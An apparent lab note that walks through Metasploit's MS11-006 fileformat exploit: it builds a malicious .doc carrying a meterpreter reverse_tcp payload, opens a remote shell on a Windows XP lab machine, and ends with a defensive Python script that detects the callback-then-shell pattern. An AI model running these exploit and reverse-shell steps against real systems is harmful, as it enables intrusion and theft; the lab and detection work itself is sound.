Environment: BT5R1
msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set lhost 192.168.1.11
lhost => 192.168.1.11
msf exploit(ms11_006_createsizeddibsection) > set lport 443
lport => 443
msf exploit(ms11_006_createsizeddibsection) > set outputpath /opt/framework/msf3/data/exploits/
outputpath => /opt/framework/msf3/data/exploits/
msf exploit(ms11_006_createsizeddibsection) > show options

Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.11
lhost => 192.168.1.11
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...
msf exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

msf exploit(handler) >
Copy msf.doc to the XP machine and open it by double-clicking: BT5 does not respond.
Later I switched the folder to thumbnail view; without double-clicking msf.doc, BT5 reacted (the book says to open the document, which is probably a mistake).
msf exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.143
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-4556186478\Administrator @ ROOT-4556186478  192.168.1.11:443 -> 192.168.1.143:1099

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:44 -0400  .
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:43 -0400  ..
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:13 -0400  Application Data
40777/rwxrwxrwx   0       dir   2013-05-14 10:14:40 -0400  Cookies
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Desktop
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:21 -0400  Favorites
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:22 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2013-05-14 11:30:17 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  NetHood
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2013-05-14 11:30:35 -0400  Recent
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:02 -0400  SendTo
40555/r-xr-xr-x   0       dir   2013-05-14 17:51:30 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2013-05-14 10:10:10 -0400  Templates
100666/rw-rw-rw-  1024    fil   2013-05-14 11:32:49 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  1       fil   2013-05-14 10:23:33 -0400  ntuser.ini

meterpreter > sysinfo
Computer        : ROOT-4556186478
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>
If you switch to the Simplified Chinese version of XP and view the folder in thumbnail mode, you do not get the shell.
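A defensive example added here, not part of this lab note: the session above shows the reverse_tcp callback to the handler on TCP/443 and the `shell` command creating a cmd.exe process, and the note above shows the document firing when the folder is rendered in thumbnail view rather than when the file is opened. The script below correlates constructed Sysmon-style process and network events to flag a process that is not a normal TLS client connecting out to 443 and then spawning a shell shortly afterwards; it assumes explorer.exe is the process doing the thumbnail rendering (my assumption, not stated on the page), and all event shapes, PIDs and timestamps are constructed.

```python
from datetime import datetime

# Constructed Sysmon-style events (not from the page): (timestamp, host, kind, fields).
# "net" = outbound TCP connection made by a process, "proc" = process creation.
EVENTS = [
    ("2013-05-14T19:32:40", "ROOT-4556186478", "net",
     {"image": "explorer.exe", "pid": 1520, "dst": "192.168.1.11", "dport": 443}),
    ("2013-05-14T19:32:47", "ROOT-4556186478", "proc",
     {"image": "cmd.exe", "pid": 1888, "parent": "explorer.exe", "ppid": 1520}),
    # Benign noise: a browser talking to 443, and Explorer starting cmd.exe much later.
    ("2013-05-14T19:40:00", "ROOT-4556186478", "net",
     {"image": "iexplore.exe", "pid": 2000, "dst": "10.0.0.5", "dport": 443}),
    ("2013-05-14T19:50:00", "ROOT-4556186478", "proc",
     {"image": "cmd.exe", "pid": 2100, "parent": "explorer.exe", "ppid": 1520}),
]

# Processes for which an outbound 443 connection is expected (assumed allow-list).
EXPECTED_TLS_CLIENTS = {"iexplore.exe", "firefox.exe", "chrome.exe", "svchost.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
WINDOW_SECONDS = 60


def detect(events, window=WINDOW_SECONDS):
    """Flag a non-TLS-client process that connects out to TCP/443 and then
    spawns a shell within `window` seconds: the callback seen in the handler
    followed by the `shell` command in the meterpreter session."""
    recent_callbacks = {}  # (host, pid) -> (timestamp, image, destination)
    alerts = []
    for ts_str, host, kind, f in sorted(events, key=lambda e: e[0]):
        ts = datetime.fromisoformat(ts_str)
        if kind == "net" and f["dport"] == 443 and f["image"].lower() not in EXPECTED_TLS_CLIENTS:
            recent_callbacks[(host, f["pid"])] = (ts, f["image"], f["dst"])
        elif kind == "proc" and f["image"].lower() in SHELLS:
            hit = recent_callbacks.get((host, f["ppid"]))
            if hit is None:
                continue
            delay = (ts - hit[0]).total_seconds()
            if delay <= window:  # shell spawned soon after the suspicious callback
                alerts.append({"host": host, "parent": hit[1], "parent_pid": f["ppid"],
                               "child": f["image"], "child_pid": f["pid"],
                               "callback_dst": hit[2], "seconds_after_callback": delay})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```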